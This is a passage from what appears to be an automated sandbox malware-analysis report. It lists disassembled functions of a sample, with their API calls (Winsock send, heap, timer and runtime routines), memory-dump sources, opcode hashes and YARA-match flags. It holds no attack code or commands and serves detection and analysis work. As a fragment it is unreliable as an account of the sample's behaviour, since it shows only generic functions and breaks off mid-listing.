                                                                                                  • Instruction Fuzzy Hash: 4E1128B66007009BD7609B7999C8B5BB6E9FB88710F110A2DFA96C3790D771E840CB60
                                                                                                  Function 00973BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WSAEventSelect.WS2_32(?,00973ABB,00000023), ref: 00973C02
                                                                                                  • WSAGetLastError.WS2_32 ref: 00973C0D
                                                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00973C58
                                                                                                  • WSAGetLastError.WS2_32 ref: 00973C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EventSelectsend
                                                                                                  • String ID:
                                                                                                  • API String ID: 259408233-0
                                                                                                  • Opcode ID: b5be22bc945a58eb7c014d10f7b7578390ff744bc46c9c96986dff0e30445993
                                                                                                  • Instruction ID: c7172049a5bfb4869a6938ac18c90c1bd6aa4b00fe89e5fda705cab7c2ce3613
                                                                                                  • Opcode Fuzzy Hash: b5be22bc945a58eb7c014d10f7b7578390ff744bc46c9c96986dff0e30445993
                                                                                                  • Instruction Fuzzy Hash: 461191B2614B005BD3208F79D8C8A47B6E9FBC8710F418A2DFA9BC3651D731E8009B50
                                                                                                  Function 0092F338 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: 3f22943d5c49dd691436c8756b4f19095c9a66a4764f052f0d8222cc7fbfb8dd
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: FF117B3200415AFBCF169E84EC61CEE3F36BF58390B588824FE1858039C637C9B1AB81
                                                                                                  Function 0283B7AA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: e24c18aa744efc2439b9cb85dab561bb709aa61fb9157f0e07de783145a8ee3a
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: D41139BA40014EBBCF135E89CC51CEE3F62BB18398B488815FA5899030D736C5B1AB82
                                                                                                  Function 02D1BDEB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: 04c8fec23ea3e89da28c1854501ffeb53aca522af1438d83e0d5f9c714df9bcd
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: E2114B3204014EBBCF125E94EC11CEE7F63BB18358F588456FA5859A30C736C9B2EB91
                                                                                                  Function 0097F361 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: e4a0e531264a6b1c7510d7c703b42dd690d011d4befbc83d8fd0c11595b9c287
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: 1A114B3700414AFBCF126E84CC618EE3F26BB58394B598425FA6C69031D236C9B1AB81
                                                                                                  Function 03FC00A6 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: 3f11a2b474b621213b7bff2885527c64aa2e11b94586249f5ff6f08918604ae0
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: BB118C7649028FFBCF269E84CD01CEE7F36FB08250B498518FA1858031DB36C5B2AB81
                                                                                                  Function 0092D995 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0092D9A1
                                                                                                    • Part of subcall function 009298E6: __getptd_noexit.LIBCMT ref: 009298E9
                                                                                                    • Part of subcall function 009298E6: __amsg_exit.LIBCMT ref: 009298F6
                                                                                                  • __amsg_exit.LIBCMT ref: 0092D9C1
                                                                                                  • __lock.LIBCMT ref: 0092D9D1
                                                                                                  • _free.LIBCMT ref: 0092DA01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170801528-0
                                                                                                  • Opcode ID: dcfced8234ba75e6e02d5464e1e82598378604a0c6e90570ba5556207cf73916
                                                                                                  • Instruction ID: 3eb6774482def40d1c144d648ded23d70a99fb15bad328f69aab31886d155eee
                                                                                                  • Opcode Fuzzy Hash: dcfced8234ba75e6e02d5464e1e82598378604a0c6e90570ba5556207cf73916
                                                                                                  • Instruction Fuzzy Hash: 9E01D23690B6319BDB11EF64B886B6DB774BF44710F054004F8006B2D9CB34AD81DBD2
                                                                                                  Function 02834244 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02834250
                                                                                                    • Part of subcall function 0283381A: __getptd_noexit.LIBCMT ref: 0283381D
                                                                                                    • Part of subcall function 0283381A: __amsg_exit.LIBCMT ref: 0283382A
                                                                                                  • __amsg_exit.LIBCMT ref: 02834270
                                                                                                  • __lock.LIBCMT ref: 02834280
                                                                                                  • _free.LIBCMT ref: 028342B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170801528-0
                                                                                                  • Opcode ID: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                  • Instruction ID: f3ca6273cb5cf878ae5635d7451ba58b3450429b0902bef3cbcc538218de26ea
                                                                                                  • Opcode Fuzzy Hash: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                  • Instruction Fuzzy Hash: DF01C43DD02630E7DB22EF68884878977A1BF04750F654145E804F32A0CB346986CFD6
                                                                                                  Function 03FB8B40 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 03FB8B4C
                                                                                                    • Part of subcall function 03FB8116: __getptd_noexit.LIBCMT ref: 03FB8119
                                                                                                    • Part of subcall function 03FB8116: __amsg_exit.LIBCMT ref: 03FB8126
                                                                                                  • __amsg_exit.LIBCMT ref: 03FB8B6C
                                                                                                  • __lock.LIBCMT ref: 03FB8B7C
                                                                                                  • _free.LIBCMT ref: 03FB8BAC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170801528-0
                                                                                                  • Opcode ID: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                  • Instruction ID: 3f441f88208e81df2ddcef5bf29c1eda7f59e1a869865b7a8b1f80488f54fab7
                                                                                                  • Opcode Fuzzy Hash: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                  • Instruction Fuzzy Hash: 15015EF9D017A2EBDB21EF768C447D9B778EB44790F598045E8106B390C7345982CBD6
                                                                                                  Function 02D041E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(02D04FB5,02D04E55,02D042BE,00000000,?,?,02D04E55,?,?,?,?,00000000,000000FF), ref: 02D041E8
                                                                                                  • LeaveCriticalSection.KERNEL32(02D04FB5,?,?,?,00000000,000000FF), ref: 02D041F6
                                                                                                  • LeaveCriticalSection.KERNEL32(02D04FB5), ref: 02D04257
                                                                                                  • SetEvent.KERNEL32(8520468B), ref: 02D04272
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$EnterEvent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3394196147-0
                                                                                                  • Opcode ID: dd1eefdbc4331c7cc234f2298badd5d655a9815ea505edbaa1ace0b02fc8b372
                                                                                                  • Instruction ID: 48c47ae716f8ed8c4135f8d837ea218bccd39514737e99729c7cbc574cb390f1
                                                                                                  • Opcode Fuzzy Hash: dd1eefdbc4331c7cc234f2298badd5d655a9815ea505edbaa1ace0b02fc8b372
                                                                                                  • Instruction Fuzzy Hash: 0111F2B0A01B019FD724CF74D588A96B7E9BF4C300B55C92DE95A8B351EB31E905CB00
                                                                                                  Function 02D04B00 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(00000001,?,00000001,?,02D03C4F,?,?,00000001), ref: 02D04B15
                                                                                                  • InterlockedIncrement.KERNEL32(00000001), ref: 02D04B24
                                                                                                  • InterlockedIncrement.KERNEL32(00000001), ref: 02D04B31
                                                                                                  • timeGetTime.WINMM(?,02D03C4F,?,?,00000001), ref: 02D04B48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: IncrementInterlockedTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 159728177-0
                                                                                                  • Opcode ID: ce94813d5c8c3a849df554321bf1737643e3186c65841f5bbba3dba2ed6808e8
                                                                                                  • Instruction ID: b1f670b568d1b1eca10328443e12f6bb346e19312be9be147f9ae69031daf9cf
                                                                                                  • Opcode Fuzzy Hash: ce94813d5c8c3a849df554321bf1737643e3186c65841f5bbba3dba2ed6808e8
                                                                                                  • Instruction Fuzzy Hash: C101C8B1A007059FC720DF6AD880A4AFBF9EF58750741892EE549C7710E775E9448FA0
                                                                                                  Function 00974AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(00000001,?,00000001,?,00973C4F,?,?,00000001), ref: 00974AF5
                                                                                                  • InterlockedIncrement.KERNEL32(00000001), ref: 00974B04
                                                                                                  • InterlockedIncrement.KERNEL32(00000001), ref: 00974B11
                                                                                                  • timeGetTime.WINMM(?,00973C4F,?,?,00000001), ref: 00974B28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: IncrementInterlockedTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 159728177-0
                                                                                                  • Opcode ID: f9e477645368bb216446725c9d1d65551c10964ce99969a50b57358bd26b2169
                                                                                                  • Instruction ID: d22eba59fbf4ee35f5a7028e9ffe64195589803010066b0c27cc56c0a1f5b2fb
                                                                                                  • Opcode Fuzzy Hash: f9e477645368bb216446725c9d1d65551c10964ce99969a50b57358bd26b2169
                                                                                                  • Instruction Fuzzy Hash: 82010C716007049FC720EF7AD88094AF7E9AF58650701892AE54DC7611E774E5448F90
                                                                                                  Function 02D03660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02D03667
                                                                                                  • _free.LIBCMT ref: 02D0369C
                                                                                                    • Part of subcall function 02D0F639: RtlFreeHeap.NTDLL(00000000,00000000,?,02D13E4C,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F64F
                                                                                                    • Part of subcall function 02D0F639: GetLastError.KERNEL32(00000000,?,02D13E4C,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000), ref: 02D0F661
                                                                                                  • _malloc.LIBCMT ref: 02D036D7
                                                                                                  • _memset.LIBCMT ref: 02D036E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3340475617-0
                                                                                                  • Opcode ID: 963db20f15fe977f31f5b2484ad4db0c699d664d64b55234e7474a14d357bb2e
                                                                                                  • Instruction ID: 38e96cf56d87582218c978f8de74e4b5629e9caec6f6236853da9b6149e751bd
                                                                                                  • Opcode Fuzzy Hash: 963db20f15fe977f31f5b2484ad4db0c699d664d64b55234e7474a14d357bb2e
                                                                                                  • Instruction Fuzzy Hash: C2011AF0900B40DFE3609F7A98C1B97BAE9EB85304F50482EE5AE83701CA30AC05CF20
                                                                                                  Function 00973660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00973667
                                                                                                  • _free.LIBCMT ref: 0097369C
                                                                                                    • Part of subcall function 00976E49: HeapFree.KERNEL32(00000000,00000000,?,00979900,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976E5F
                                                                                                    • Part of subcall function 00976E49: GetLastError.KERNEL32(00000000,?,00979900,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000), ref: 00976E71
                                                                                                  • _malloc.LIBCMT ref: 009736D7
                                                                                                  • _memset.LIBCMT ref: 009736E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3340475617-0
                                                                                                  • Opcode ID: d7af785c08cbcc32cda3bcc952e289c14862227343d5696597fd298bc903171e
                                                                                                  • Instruction ID: 428212f69c6497a7902c07e6f75722af52cb56ab91317f89c909155d467b44cb
                                                                                                  • Opcode Fuzzy Hash: d7af785c08cbcc32cda3bcc952e289c14862227343d5696597fd298bc903171e
                                                                                                  • Instruction Fuzzy Hash: F201DEF5900B04DFE3209F7AD881B97BAE8EF85314F11882EE5AE83302D63169048F60
                                                                                                  Function 00926EEE Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00926F08
                                                                                                    • Part of subcall function 00926E5A: __FF_MSGBANNER.LIBCMT ref: 00926E73
                                                                                                    • Part of subcall function 00926E5A: __NMSG_WRITE.LIBCMT ref: 00926E7A
                                                                                                  • std::exception::exception.LIBCMT ref: 00926F3D
                                                                                                  • std::exception::exception.LIBCMT ref: 00926F57
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00926F68
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2388904642-0
                                                                                                  • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                  • Instruction ID: 6e6c65b8fee333ca83a3e09d36c3609520d59431495f8cb1687d54c44773da0c
                                                                                                  • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                  • Instruction Fuzzy Hash: AFF02831404279A7DF00EBA4FC85BAD7AF9EB81304F140058F424AA4DADFB1CAC08750
                                                                                                  Function 0282F0C6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0282F0E0
                                                                                                    • Part of subcall function 0282F032: __FF_MSGBANNER.LIBCMT ref: 0282F04B
                                                                                                    • Part of subcall function 0282F032: __NMSG_WRITE.LIBCMT ref: 0282F052
                                                                                                  • std::exception::exception.LIBCMT ref: 0282F115
                                                                                                  • std::exception::exception.LIBCMT ref: 0282F12F
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0282F140
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2388904642-0
                                                                                                  • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                  • Instruction ID: 61fb881e2658eeaa18c94c1d8b444298621201e74bc56865f01437fe6b759ac9
                                                                                                  • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                  • Instruction Fuzzy Hash: 42F02D7D4002386BDB15EB58DC14ABE7BBAEB50744FD0406DD504D64D0DB718A85CF92
                                                                                                  Function 03FB39C2 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 03FB39DC
                                                                                                    • Part of subcall function 03FB392E: __FF_MSGBANNER.LIBCMT ref: 03FB3947
                                                                                                    • Part of subcall function 03FB392E: __NMSG_WRITE.LIBCMT ref: 03FB394E
                                                                                                  • std::exception::exception.LIBCMT ref: 03FB3A11
                                                                                                  • std::exception::exception.LIBCMT ref: 03FB3A2B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 03FB3A3C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2388904642-0
                                                                                                  • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                  • Instruction ID: 8cd98999f1aaf5f8279cfbe77d76aba02e05cfec9f46bbe54cdaf7b11713b454
                                                                                                  • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                  • Instruction Fuzzy Hash: 58F0F9FD940315ABDB01EB56DC649FE7A79DB40650FD4402BD4009A090DB71CA06CB81
                                                                                                  Function 02D0CD80 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D01420: HeapFree.KERNEL32(?,00000000,?,?,?,02D040B1,?,00000000,02D04039,?,76F8DFA0,02D03648), ref: 02D0143D
                                                                                                    • Part of subcall function 02D01420: _free.LIBCMT ref: 02D01459
                                                                                                  • HeapDestroy.KERNEL32(00000000), ref: 02D0CD93
                                                                                                  • HeapCreate.KERNEL32(?,?,?), ref: 02D0CDA5
                                                                                                  • _free.LIBCMT ref: 02D0CDB5
                                                                                                  • HeapDestroy.KERNEL32 ref: 02D0CDE2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Destroy_free$CreateFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 4097506873-0
                                                                                                  • Opcode ID: 28abed68c4aee4316e20ea695313987e66f90e7b0cc7ca42f25ed2ce7f5270f4
                                                                                                  • Instruction ID: 8e88e158ef938da801466cb6f10c5a1701bb93a381a1d5443f5dd3feeb515c5f
                                                                                                  • Opcode Fuzzy Hash: 28abed68c4aee4316e20ea695313987e66f90e7b0cc7ca42f25ed2ce7f5270f4
                                                                                                  • Instruction Fuzzy Hash: DFF049B9500702ABD3209F24E888B53BBB9FF84714F118A1DE859CB790DB75EC55CBA0
                                                                                                  Function 00976490 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00971420: HeapFree.KERNEL32(?,00000000,?,?,?,009740B1,?,00000000,00974039,?,76F8DFA0,00973648), ref: 0097143D
                                                                                                    • Part of subcall function 00971420: _free.LIBCMT ref: 00971459
